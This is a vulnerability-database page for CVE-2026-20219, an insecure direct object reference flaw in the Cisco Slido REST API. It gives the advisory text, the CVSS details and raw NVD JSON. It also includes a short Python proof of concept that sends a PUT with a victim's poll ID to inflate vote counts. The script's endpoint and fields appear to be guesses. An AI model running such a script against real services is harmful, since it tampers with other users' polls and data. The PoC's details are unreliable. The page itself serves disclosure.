Security Vulnerability Report
中文
CVE-2026-20219 CVSS 5.4 MEDIUM

CVE-2026-20219

Published: 2026-05-06 17:16:22
Last Modified: 2026-05-06 18:59:53
Source: [email protected]

Description

A vulnerability in the REST API of Cisco Slido could have allowed an authenticated, remote attacker to access the social profile data of other users or affect quiz and poll results. Cisco has addressed this vulnerability in Cisco Slido and no customer action is needed. This vulnerability existed because of the presence of an insecure direct object reference. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by sending a crafted request to the vulnerable API endpoint. A successful exploit could have allowed the attacker to view the social profiles of other users or affect quiz and poll results.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Slido (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Cisco Slido IDOR PoC Concept # Target: Vulnerable REST API endpoint for user profiles or polls target_api = "https://api.slido.com/v2/moderate/poll/{}" # Attacker's authenticated headers (Obtained after login) headers = { "Authorization": "Bearer <attacker_valid_token>", "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" } # Victim's Poll ID or User ID (Insecure Direct Object Reference) target_object_id = "victim_poll_id_12345" # Malicious payload to affect poll results payload = { "option_id": "malicious_option_id", "vote_count": 9999 } # Craft the request exploit_url = target_api.format(target_object_id) try: response = requests.put(exploit_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit Successful! Poll/Profile data modified or accessed.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20219", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.760", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the REST API of Cisco Slido could have allowed an authenticated, remote attacker to access the social profile data of other users or affect quiz and poll results. Cisco has addressed this vulnerability in Cisco Slido and no customer action is needed.\r\n\r This vulnerability existed because of the presence of an insecure direct object reference. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by sending a crafted request to the vulnerable API endpoint. A successful exploit could have allowed the attacker to view the social profiles of other users or affect quiz and poll results."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-slido-idor-CpsFmKxN", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.